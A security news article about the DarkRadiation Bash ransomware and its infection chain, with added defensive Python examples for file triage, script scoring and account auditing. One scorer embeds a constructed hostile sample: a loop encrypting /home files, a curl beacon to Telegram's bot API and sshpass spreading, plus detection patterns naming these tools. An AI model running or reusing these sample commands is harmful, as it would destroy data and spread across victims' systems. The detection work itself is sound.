URL: https://mrhacker.co/news/darkradiation-ransomware-targeting-redhat-debian-linux-distributions?feed_id=23710&_unique_...

DARKRADIATION RANSOMWARE TARGETING REDHAT, DEBIAN LINUX DISTRIBUTIONS

By root
Posted on September 10, 2021


THE NEWLY DISCOVERED DARKRADIATION RANSOMWARE CHAIN IS UNLIKE ANY OTHER
RANSOMWARE FAMILY.

Trend Micro researchers have published an analysis of a newly identified
ransomware strain dubbed DarkRadiation. The strain is written entirely in Bash,
which leaves signature-based security software with far less to match on than
a compiled binary and makes it harder to flag as a threat.


Its primary targets are Linux hosts and Docker containers, which is
particularly concerning for enterprises. It also uses Telegram's bot API,
rather than a conventional C&C protocol, to report back to its operators.

> “The ransomware … targets Red Hat/CentOS and Debian Linux distributions. The
> malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various
> directories. It also uses Telegram’s API to send an infection status to the
> threat actor(s),” researchers noted in their report.
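The report says files are encrypted with OpenSSL's AES-CBC. A responder triaging a Linux host wants a quick way to tell which files that tool has touched. The following added example (this page's own illustration, not code from the article or from Trend Micro) scans a directory for the artifacts `openssl enc` leaves behind. It assumes the script ran `openssl enc` in its default salted mode, which writes the 8-byte magic "Salted__" and an 8-byte salt before the ciphertext; a script that passes -nosalt or a raw -K/-iv key pair leaves no header, so a high-entropy check is used as a fallback. The sample files it builds in a temporary directory are constructed for illustration.

```python
"""Triage helper: find files that look like `openssl enc` output.

Added example, not code from the article or the Trend Micro report.
Assumption: default salted mode ("Salted__" + 8-byte salt + ciphertext).
-nosalt / -K -iv usage leaves no magic, hence the entropy fallback.
"""
import math
import os
import tempfile
from collections import Counter

OPENSSL_MAGIC = b"Salted__"
HEADER_LEN = 16          # 8-byte magic + 8-byte salt
AES_BLOCK = 16
ENTROPY_THRESHOLD = 7.5  # bits per byte; random ciphertext approaches 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data`."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(path: str) -> str:
    """Return 'openssl-salted', 'suspect-high-entropy' or 'clean'."""
    with open(path, "rb") as fh:
        head = fh.read(HEADER_LEN)
        body = fh.read(4096)
    size = os.path.getsize(path)
    # CBC output after the header is always a whole number of AES blocks.
    if (head.startswith(OPENSSL_MAGIC) and size >= HEADER_LEN + AES_BLOCK
            and (size - HEADER_LEN) % AES_BLOCK == 0):
        return "openssl-salted"
    sample = head + body
    if len(sample) >= 256 and shannon_entropy(sample) > ENTROPY_THRESHOLD:
        return "suspect-high-entropy"
    return "clean"


def scan_tree(root: str) -> dict:
    """Walk `root`; map each flagged file (relative path) to its verdict."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                verdict = classify(full)
            except OSError:
                continue          # unreadable file: skip, do not crash triage
            if verdict != "clean":
                hits[os.path.relpath(full, root)] = verdict
    return hits


def build_sample_tree() -> str:
    """Constructed sample data (not real malware output): one fake
    openssl-salted file, one random blob, one plain text file."""
    root = tempfile.mkdtemp(prefix="dr_triage_")
    fake_ct = OPENSSL_MAGIC + os.urandom(8) + os.urandom(AES_BLOCK * 4)
    with open(os.path.join(root, "report.docx"), "wb") as fh:
        fh.write(fake_ct)
    with open(os.path.join(root, "blob.bin"), "wb") as fh:
        fh.write(os.urandom(1024))
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("quarterly numbers\n" * 50)
    return root


if __name__ == "__main__":
    for rel, verdict in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{verdict:22} {rel}")
```

The magic-header match is the reliable signal; the entropy fallback will also flag legitimately compressed or already-encrypted data (archives, images, key material), so treat those hits as candidates to inspect, not as confirmed ransomware output.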


ABOUT DARKRADIATION RANSOMWARE

The ransomware was first flagged by Twitter user @r3dbU7z on 28 May and was
later analyzed by Trend Micro researchers. It was found on VirusTotal as part
of a collection of hacking tools hosted on the threat actor's infrastructure in
a directory named "api_attack."


At the time of writing there is no information on the ransomware's delivery
method and no evidence of in-the-wild attacks. Assessment of its components,
however, shows that the developers intend it for Linux hosts and Docker
containers.

DarkRadiation ransomware’s ransom note


DARKRADIATION INFECTION CHAIN DETAILS

DarkRadiation's infection chain is a multi-stage process built from a complex
set of Bash scripts and roughly six C&C servers, all offline when the report
was published. The scripts talk to Telegram bots using hard-coded API keys,
which also means a defender who obtains a sample can extract the bot token and
fingerprint the channel. The scripts depend on several standard tools: curl,
wget, OpenSSL, sshpass and pssh.
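Because the chain is plain Bash with hard-coded Telegram credentials and a fixed set of helper tools, its traits can be matched statically. The added example below (this page's own illustration, not code from the article or any vendor report) scores a shell script against those traits: a Telegram bot token, an api.telegram.org beacon, AES-CBC via openssl enc, sshpass and pssh for spreading, and the yum bootstrap described further down. The regexes, weights and alert threshold are this example's own assumptions, and the two sample scripts are constructed, not real DarkRadiation samples.

```python
"""Static triage of shell scripts for DarkRadiation-like traits.

Added example, not code from the article or any vendor report. Patterns,
weights and threshold are assumptions chosen for illustration.
"""
import re

# Telegram bot tokens have the shape <numeric bot id>:<35-char secret>.
INDICATORS = {
    "telegram_bot_token": (re.compile(r"\b\d{6,12}:[A-Za-z0-9_-]{35}\b"), 5),
    "telegram_api_call":  (re.compile(r"api\.telegram\.org/bot"), 3),
    "openssl_aes_cbc":    (re.compile(r"openssl\s+enc\b[^\n]*-aes-\d+-cbc"), 3),
    "sshpass_lateral":    (re.compile(r"\bsshpass\s+-p\b"), 2),
    "pssh_fanout":        (re.compile(r"\b(pssh|parallel-ssh)\b"), 2),
    "yum_bootstrap":      (re.compile(r"\byum\s+(-y\s+)?install\b"), 1),
    "password_rewrite":   (re.compile(r"\bchpasswd\b"), 2),
    "user_add":           (re.compile(r"\buseradd\b"), 1),
    "user_delete":        (re.compile(r"\buserdel\b"), 2),
}
ALERT_THRESHOLD = 8


def scan_script(text: str) -> dict:
    """Return {indicator: [line numbers]} for every indicator that fires."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, (pattern, _weight) in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def score(hits: dict) -> int:
    """Sum each fired indicator's weight once, not once per occurrence,
    so a long script with many openssl calls does not inflate the score."""
    return sum(INDICATORS[name][1] for name in hits)


def is_suspicious(text: str) -> bool:
    return score(scan_script(text)) >= ALERT_THRESHOLD


# Constructed sample with the shape the article describes (not a real sample).
SAMPLE_SCRIPT = r"""#!/bin/bash
TOKEN="123456789:AAHkL0rWb4r2QxY1z3M6nP9qR8sT7uV0wXY"
command -v sshpass >/dev/null || yum -y install sshpass
for f in $(find /home -type f); do
  openssl enc -aes-256-cbc -salt -in "$f" -out "$f.enc" -pass pass:"$KEY"
done
curl -s "https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$CHAT&text=done"
sshpass -p "$PW" ssh root@10.0.0.5 'bash -s' < "$0"
"""

# Constructed benign script that shares some of the same commands.
BENIGN_SCRIPT = r"""#!/bin/bash
yum -y install httpd
useradd -m deploy
openssl enc -aes-256-cbc -salt -in backup.tar -out backup.tar.enc -pass file:/root/key
"""

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        h = scan_script(text)
        print(f"{label}: score={score(h)} suspicious={is_suspicious(text)}")
        for name, lines in sorted(h.items()):
            print(f"  {name:20} lines {lines}")
```

The benign backup script trips three indicators but stays under the threshold; it is the combination of a bot token, a Telegram beacon and credential-based SSH spreading in one file that pushes a script over it. Obfuscated scripts will not match these literal patterns, so pair this with the behavioural and account checks elsewhere on this page.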


If a host lacks any of these tools, DarkRadiation installs them through YUM
(Yellowdog Updater, Modified), the Python-based package manager used by Red
Hat, CentOS and related distributions. For defenders, an unexpected yum
install of sshpass or pssh on a production server is therefore a detection
signal in its own right.


In the final stage, the ransomware retrieves the list of users on the infected
host, overwrites their passwords with a mega-password, creates a new user named
"Ferrum" with the password "MegPw0rD3," and then deletes all other shell users,
as SentinelOne researchers described in a separate blog post.
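That final stage leaves a distinctive footprint in /etc/passwd and /etc/shadow: an account appears, interactive accounts disappear, and the surviving accounts' password hashes all change at once. The added example below (this page's own illustration, not code from the article or from SentinelOne) diffs a known-good snapshot of those files against the current ones and raises an alert on that pattern or on any new UID 0 account. The snapshot-and-diff approach and the passwd/shadow listings are this example's own assumptions and constructed data with placeholder hashes, not files from a real incident.

```python
"""Account audit for the final stage described above: passwords rewritten,
a new "Ferrum" account added, the other shell users deleted.

Added example, not code from the article or from SentinelOne. The
snapshot approach and the listings below are constructed assumptions.
"""
from dataclasses import dataclass

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}


@dataclass(frozen=True)
class Account:
    name: str
    uid: int
    gid: int
    home: str
    shell: str

    @property
    def interactive(self) -> bool:
        return self.shell not in NOLOGIN_SHELLS


def parse_passwd(text: str) -> dict:
    """Parse passwd(5) lines: name:pw:uid:gid:gecos:home:shell."""
    accounts = {}
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {raw!r}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        accounts[name] = Account(name, int(uid), int(gid), home, shell)
    return accounts


def audit(baseline: dict, current: dict) -> dict:
    """Diff two parsed passwd tables. 'alert' is set for the pattern the
    article describes (accounts added while interactive ones vanish)
    or for any new UID 0 account."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    common = set(baseline) & set(current)
    findings = {
        "added_accounts": added,
        "removed_interactive": [n for n in removed if baseline[n].interactive],
        "new_uid0": [n for n in added if current[n].uid == 0],
        "shell_changed": sorted(n for n in common
                                if baseline[n].shell != current[n].shell),
    }
    findings["alert"] = bool(findings["new_uid0"] or
                             (added and findings["removed_interactive"]))
    return findings


def changed_hashes(baseline_shadow: str, current_shadow: str) -> list:
    """Accounts whose shadow(5) hash field differs between snapshots; a
    mass password overwrite lists every surviving account here."""
    def hashes(text):
        return {l.split(":")[0]: l.split(":")[1]
                for l in text.splitlines() if l.count(":") >= 8}
    before, after = hashes(baseline_shadow), hashes(current_shadow)
    return sorted(n for n in after if n in before and after[n] != before[n])


# Constructed snapshots (placeholder hashes, not real credentials).
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
"""
CURRENT_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ferrum:x:1002:1002::/home/ferrum:/bin/bash
"""
BASELINE_SHADOW = """\
root:$6$s1$OLDHASH:18900:0:99999:7:::
alice:$6$s2$ALICEHASH:18900:0:99999:7:::
bob:$6$s3$BOBHASH:18900:0:99999:7:::
"""
CURRENT_SHADOW = """\
root:$6$s9$NEWHASH:18950:0:99999:7:::
ferrum:$6$s8$FERRUMHASH:18950:0:99999:7:::
"""

if __name__ == "__main__":
    print(audit(parse_passwd(BASELINE_PASSWD), parse_passwd(CURRENT_PASSWD)))
    print("hash changed:", changed_hashes(BASELINE_SHADOW, CURRENT_SHADOW))
```

In practice the baseline comes from a file-integrity tool or a configuration-management snapshot taken before the incident; reading /etc/shadow requires root, so run the audit from a forensic mount or a privileged collector rather than on the live box as an unprivileged user.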

Related Items: DarkRadiation, Hacking, Linux, malware, ransomware